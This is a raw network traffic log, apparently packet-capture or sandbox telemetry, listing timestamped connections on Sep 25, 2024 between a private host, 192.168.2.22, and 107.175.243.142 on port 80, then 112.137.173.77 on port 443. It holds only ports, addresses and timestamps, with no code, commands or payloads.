                                        Sep 25, 2024 09:43:27.018989086 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019577980 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019588947 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019599915 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019610882 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019620895 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019627094 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019630909 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019635916 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019644022 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019656897 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019658089 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019666910 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019666910 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019679070 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019685030 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019691944 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019701004 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019705057 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019712925 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019731045 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019737959 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019819021 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019908905 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019921064 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.019956112 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.019968987 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020057917 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020068884 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020083904 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020092010 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020097971 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020102978 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020103931 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020113945 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020123005 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020126104 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020132065 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020138979 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020148993 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020150900 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020164013 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020164967 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020173073 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020179033 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020190954 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020194054 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020204067 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020204067 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020210028 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020215988 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020226955 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020231009 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020236969 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020239115 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.020257950 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020277977 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.020355940 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021090031 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021114111 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021120071 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021135092 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021143913 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021151066 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021152020 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021167994 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021171093 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021183968 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021189928 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021198988 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021203041 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021214962 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021222115 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021230936 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021231890 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021245003 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021251917 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021262884 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021267891 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021280050 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021281958 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021298885 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021301985 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021310091 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021317959 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021332026 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021341085 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021347046 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021348000 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021367073 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021368027 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021380901 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021385908 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021395922 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021397114 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021419048 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021425009 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021500111 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021891117 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021908998 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021924019 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021939039 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021939993 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021948099 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021954060 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021971941 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.021976948 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021976948 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.021986008 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.022011995 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.105262995 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105295897 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105314016 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105329990 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105389118 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105467081 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105475903 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105498075 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.105498075 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.105498075 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.105535030 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.105601072 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105613947 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105616093 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105623007 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105637074 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105645895 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.105667114 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.198313951 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.198321104 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.198331118 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.198333979 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.198338032 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.198340893 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.198347092 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.198362112 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.198374033 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.198384047 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.198455095 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.199028015 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199037075 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199044943 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199052095 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199059963 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199069023 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199084044 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.199084997 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199096918 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199096918 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.199105978 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199112892 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199120998 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.199121952 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.199137926 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.199150085 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.199198008 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.282459021 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282468081 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282489061 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282507896 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282577991 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282586098 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282664061 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.282711029 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282718897 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282735109 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282757998 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.282768011 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.282785892 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.282813072 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282819986 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282835960 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282844067 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.282859087 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.282876968 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283013105 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283021927 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283058882 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283067942 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283088923 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283094883 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283108950 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283118963 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283127069 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283137083 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283139944 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283147097 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283169985 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283278942 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283332109 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283344984 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283354044 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283472061 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283478022 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283485889 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283493042 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283494949 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283503056 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283524036 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283538103 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283727884 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283736944 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283751965 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283760071 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283776999 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283787012 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283795118 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283795118 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283802986 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283802986 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283812046 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283821106 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.283822060 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283835888 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283848047 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.283948898 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284207106 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284248114 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284281015 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284298897 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284320116 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284333944 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284343958 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284352064 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284385920 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284401894 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284404993 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284420967 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284421921 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284430981 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284441948 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284457922 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284485102 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284825087 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284842968 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284876108 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284893036 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284909010 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284925938 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284943104 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284945965 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284960032 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.284977913 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284991026 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.284991980 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285003901 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285010099 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285026073 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285034895 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285060883 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285063982 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285078049 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285099030 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285115004 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285140038 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285274029 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285514116 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285531044 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285547972 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285564899 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285574913 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285583973 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285588980 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285600901 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285618067 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285629034 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285634041 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285638094 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285653114 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285654068 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285670042 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285684109 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285686970 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285698891 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285698891 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285710096 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285743952 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285756111 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285762072 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285778999 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285778999 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285795927 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285795927 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285813093 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285815001 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285825014 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285830975 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285849094 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285851002 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285866022 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.285882950 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.285911083 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286474943 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286493063 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286525011 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286542892 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286561966 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286573887 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286587954 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286592960 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286609888 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286614895 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286627054 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286634922 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286644936 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286659002 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286662102 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286679029 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286689997 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286695957 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286712885 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286716938 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286730051 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286746025 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286746979 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286762953 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286772966 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286780119 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286798000 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286803007 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286813974 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.286832094 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.286863089 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.287296057 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.287333012 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.287349939 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.287359953 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.287399054 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.287403107 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.287422895 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:27.287435055 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:27.287458897 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:28.258985996 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:28.323793888 CEST49164443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:28.323828936 CEST44349164112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:28.323895931 CEST49164443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:28.324047089 CEST49164443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:28.324089050 CEST44349164112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:28.324166059 CEST49164443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:28.394543886 CEST49165443192.168.2.22112.137.173.77
